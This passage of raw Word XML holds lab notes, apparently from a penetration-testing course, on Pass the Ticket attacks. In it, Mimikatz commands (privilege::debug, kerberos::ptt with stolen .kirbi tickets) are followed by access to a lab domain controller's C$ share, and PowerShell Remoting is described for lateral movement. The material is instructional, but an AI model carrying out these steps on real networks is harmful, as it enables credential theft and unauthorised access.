            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\dc01.inlanefreight.htb\c$</w:t>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Mode                LastWriteTime         Length Name</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>----                -------------         ------ ----</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-r---         6/4/2022  11:17 AM                Program Files</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-----         6/4/2022  11:17 AM                Program Files (x86)</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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="703AF588" wp14:textId="1C66EEE5">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Finally, we can also perform the Pass the Ticket attack using the Mimikatz module kerberos::ptt and the .kirbi file that contains the ticket we want to import.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="112BF75F" wp14:textId="44712BBE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="012D95EC" wp14:textId="2F219F8B">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3ED1A51D" wp14:textId="182D5592">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 xml:space="preserve">C:\tools&gt; mimikatz.exe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mimikatz 2.2.0 (x64) #19041 Aug  6 2020 14:53:43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"A La Vie, A L'Amour" - (oe.eo)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 Benjamin DELPY `gentilkiwi` ( </w:t>
      </w:r>
      <w:hyperlink r:id="Rfd6e6d491b8a4251">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>benjamin@gentilkiwi.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R21d87aae34714fe0">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://blog.gentilkiwi.com/mimikatz</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v ##'       Vincent LE TOUX             ( </w:t>
      </w:r>
      <w:hyperlink r:id="Rb62199d43532484e">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vincent.letoux@gmail.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R801db633307342a0">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://pingcastle.com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w:t>
      </w:r>
      <w:hyperlink r:id="R3c2d939bf353433f">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://mysmartlogon.com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privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Privilege '20'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kerberos::ptt "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w: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File: '</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>': OK</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>mimikatz # exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Bye!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c:\tools&gt; dir </w:t>
      </w:r>
      <w:hyperlink r:id="R7177101cd0cf443c">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\DC01.inlanefreight.htb\c$</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Directory: </w:t>
      </w:r>
      <w:hyperlink r:id="R2d2718addfcf4e53">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\dc01.inlanefreight.htb\c$</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mode                LastWriteTime         Length Name</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>----                -------------         ------ ----</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-r---         6/4/2022  11:17 AM                Program Files</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-----         6/4/2022  11:17 AM                Program Files (x86)</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&lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="5B8F80AA" wp14:textId="58A83974">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of opening mimikatz.exe with cmd.exe and exiting to get the ticket into the current command prompt, we can use the Mimikatz module misc to launch a new command prompt window with the imported ticket using the misc::cmd command.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5EBF3E91" wp14:textId="4C000B5D"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="449A4036" wp14:textId="198FCC77">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass The Ticket with PowerShell Remoting (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="5B2D12E8" wp14:textId="6B7869B2">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:hyperlink r:id="Rddf14d4b0ef144ac">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>PowerShell Remoting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows us to run scripts or commands on a remote computer. Administrators often use PowerShell Remoting to manage remote computers on the network. Enabling PowerShell Remoting creates both HTTP and HTTPS listeners. The listener runs on standard port TCP/5985 for HTTP and TCP/5986 for HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="364C941B" wp14:textId="3565BA52">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To create a PowerShell Remoting session on a remote computer, you must have administrative permissions, be a member of the Remote Management Users group, or have explicit PowerShell Remoting permissions in your session configuration.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="0AE6EB33" wp14:textId="5301783C">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Suppose we find a user account that doesn't have administrative privileges on a remote computer but is a member of the Remote Management Users group. In that case, we can use PowerShell Remoting to connect to that computer and execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="38A5CE37" wp14:textId="42817321"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4AE7BEC8" wp14:textId="7C2FB5F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - PowerShell Remoting with Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="10C3AF71" wp14:textId="5A4FD88E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To use PowerShell Remoting with Pass the Ticket, we can use Mimikatz to import our ticket and then open a PowerShell console and connect to the target machine. Let's open a new cmd.exe and execute mimikatz.exe, then import the ticket we collected using kerberos::ptt. Once the ticket is imported into our cmd.exe session, we can launch a PowerShell command prompt from the same cmd.exe and use the command Enter-PSSession to connect to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="0C804674" wp14:textId="303AB8D5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - Pass the Ticket for Lateral Movement.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="75263678" wp14:textId="66E715E9">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79D3577A" wp14:textId="3D9344D5">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mimikatz.exe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mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53</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"A La Vie, A L'Amour" - (oe.eo)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 Benjamin DELPY `gentilkiwi` ( </w:t>
      </w:r>
      <w:hyperlink r:id="R2bd8aa025b014066">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>benjamin@gentilkiwi.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Rfb7ae5b08c2e4a17">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://blog.gentilkiwi.com/mimikatz</w:t>
        </w:r>
        <w:r>
          <w:br/>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v ##'       Vincent LE TOUX             ( </w:t>
      </w:r>
      <w:hyperlink r:id="Rd7c52e31cae44dd2">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vincent.letoux@gmail.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R75fd664fd0624eba">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://pingcastle.com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 </w:t>
      </w:r>
      <w:hyperlink r:id="Rc1e192a59d534378">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://mysmartlogon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ***/</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privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Privilege '20'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kerberos::ptt "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w: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File: '</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>': OK</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mimikatz # exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Bye!</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c:\tools&gt;powershell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
